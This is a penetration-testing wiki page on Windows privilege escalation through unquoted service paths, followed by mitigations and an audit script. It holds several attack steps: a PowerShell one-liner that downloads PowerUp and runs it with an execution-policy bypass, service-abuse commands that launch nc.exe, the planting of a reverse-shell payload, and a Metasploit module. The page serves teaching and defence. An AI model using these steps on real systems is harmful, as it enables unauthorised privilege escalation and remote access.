# EoP - Unquoted Service Paths

## Unquoted Service Path Vulnerabilities: Identification and Exploitation

### Key Concepts

* **Service Path**: The location of the executable file that a service runs.
* **Unquoted Path**: A service path containing spaces but lacking quotation marks (e.g., `C:\Program Files\My Service\service.exe` instead of `"C:\Program Files\My Service\service.exe"`).
* **Privilege Escalation**: Gaining elevated access to protected resources.

***

### Identifying Unquoted Service Paths

#### **1. Using WMIC**

The **Windows Management Instrumentation Command-line (WMIC)** can enumerate services with unquoted paths:

```cmd
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
```

#### **2. Using PowerShell**

A PowerShell script provides a more automated method to identify unquoted paths:

```powershell
# Report LocalSystem services whose binary path contains a space but is not quoted.
# A bare `-match " "` would also list correctly quoted paths, so they are excluded.
Get-WmiObject -Class Win32_Service |
    Where-Object { $_.StartName -eq "LocalSystem" } |
    Select-Object Name, DisplayName, PathName, StartMode |
    Where-Object { $_.PathName -match " " -and $_.PathName -notmatch '^"' }
```

#### **3. Using PowerUp**

PowerUp, a PowerShell script, identifies privilege escalation vectors, including unquoted paths:

```powershell
powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://xyz/PowerUp.ps1'); Invoke-AllChecks"
```

**Example Output:**

```plaintext
[*] Checking for unquoted service paths...
ServiceName : BBSvc
Path        : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe
StartName   : LocalSystem
AbuseFunction: Write-ServiceBinary -ServiceName 'BBSvc' -Path <HijackPath>
```

***

### Exploiting Unquoted Service Paths

#### **Manual Exploitation Steps**

1. **Identify the Vulnerable Service**:\
   Use the methods above to detect vulnerable services.
2. **Create a Malicious Executable**:\
   Generate a payload (e.g., a reverse shell) and place it in the same directory as the legitimate executable.
3. **Stop the Service**:

   ```cmd
   sc stop [SERVICE_NAME]
   ```
4. **Replace the Executable**:\
   Replace the legitimate executable with the malicious payload.
5. **Restart the Service**:

   ```cmd
   sc start [SERVICE_NAME]
   ```
6. **Gain Access**:\
   When the service restarts, it will execute the malicious payload with elevated privileges.

***

#### **Example of Automatic Exploitation with PowerUp**

Use PowerUp’s `Invoke-ServiceAbuse` to automate exploitation:

```powershell
Invoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 1"
```

Replace `[SERVICE_NAME]` with the vulnerable service name and specify the payload command.

***

#### **Example of Exploitation Behavior**

For a service with the path:

```plaintext
C:\Program Files\Something\legit.exe
```

Windows will attempt to execute:

1. `C:\Program.exe`
2. `C:\Program Files.exe`
3. `C:\Program Files\Something\legit.exe`

If a malicious `Program.exe` or `Program Files.exe` is placed in these locations, it will execute with elevated privileges.

***

### Exploiting with Metasploit

Metasploit provides an exploit module for unquoted service paths:

```bash
use exploit/windows/local/trusted_service_path
```

This automates the process of finding and exploiting unquoted paths.

***

### Mitigation Strategies

#### **1. Quote Service Paths**

Always enclose service paths in quotes, particularly if they contain spaces:

```plaintext
"C:\Program Files\My Service\service.exe"
```

#### **2. Regular Audits**

Periodically audit service configurations to detect and remediate unquoted paths.
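As an added example (not from the original page) covering mitigations 1 and 2 together, the script below audits `Win32_Service` entries for an unquoted executable path containing a space and, when run without `-WhatIf`, rewrites the service's `ImagePath` with quotes. The function names are my own; the split heuristic assumes the executable ends at the first `.exe`.

```powershell
# Added example (not from the original page): audit Win32_Service entries for an
# unquoted executable path that contains spaces, then quote them in the registry.
# Run from an elevated PowerShell session; -WhatIf previews the changes.

# Split a raw PathName into executable and arguments. The executable is assumed
# to end at the first ".exe" (case-insensitive); anything after it is arguments.
function Split-ServicePath {
    param([string]$PathName)
    $m = [regex]::Match($PathName, '^(?<exe>.+?\.exe)(?<args>.*)$', 'IgnoreCase')
    if (-not $m.Success) { return $null }   # non-.exe hosts are skipped
    [pscustomobject]@{ Exe = $m.Groups['exe'].Value; Args = $m.Groups['args'].Value }
}

# Report services whose executable path has a space but no leading quote.
# Unlike a plain "-match ' '" test, this ignores paths that are already quoted
# and spaces that appear only in the argument list.
function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            $_.PathName -and
            $_.PathName -notmatch '^\s*"' -and
            (Split-ServicePath $_.PathName).Exe -match ' '
        } |
        Select-Object Name, StartName, StartMode, PathName
}

# Rewrite ImagePath as "<exe>"<args>, keeping the REG_EXPAND_SZ type.
# The new value takes effect the next time the service starts.
function Repair-UnquotedServicePath {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param([Parameter(ValueFromPipeline = $true)]$Service)
    process {
        $parts = Split-ServicePath $Service.PathName
        if (-not $parts) { return }
        $fixed = '"{0}"{1}' -f $parts.Exe, $parts.Args
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$($Service.Name)"
        if ($PSCmdlet.ShouldProcess($Service.Name, "Set ImagePath to $fixed")) {
            Set-ItemProperty -Path $key -Name ImagePath -Value $fixed -Type ExpandString
        }
    }
}

$findings = Get-UnquotedServicePath
$findings | Format-Table -AutoSize
$findings | Repair-UnquotedServicePath -WhatIf   # drop -WhatIf to apply the fix
```

Scheduling this script (for example as a weekly task) turns the audit in this step into a repeatable control, and the `-WhatIf` run gives a reviewable list before anything is changed.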

#### **3. Use Least Privilege**

Run services with the least privilege required, avoiding `LocalSystem` unless absolutely necessary.

#### **4. Implement Security Policies**

Adopt strict policies to manage service configurations.

#### **5. Monitoring and Alerts**

Set up monitoring to detect unauthorized changes to service paths or configurations.

***

### Additional Resources

* [**Microsoft Documentation on Windows Services**](https://learn.microsoft.com/en-us/windows/win32/services/overview-of-windows-service-applications)
* **OWASP Top 10 Security Risks**
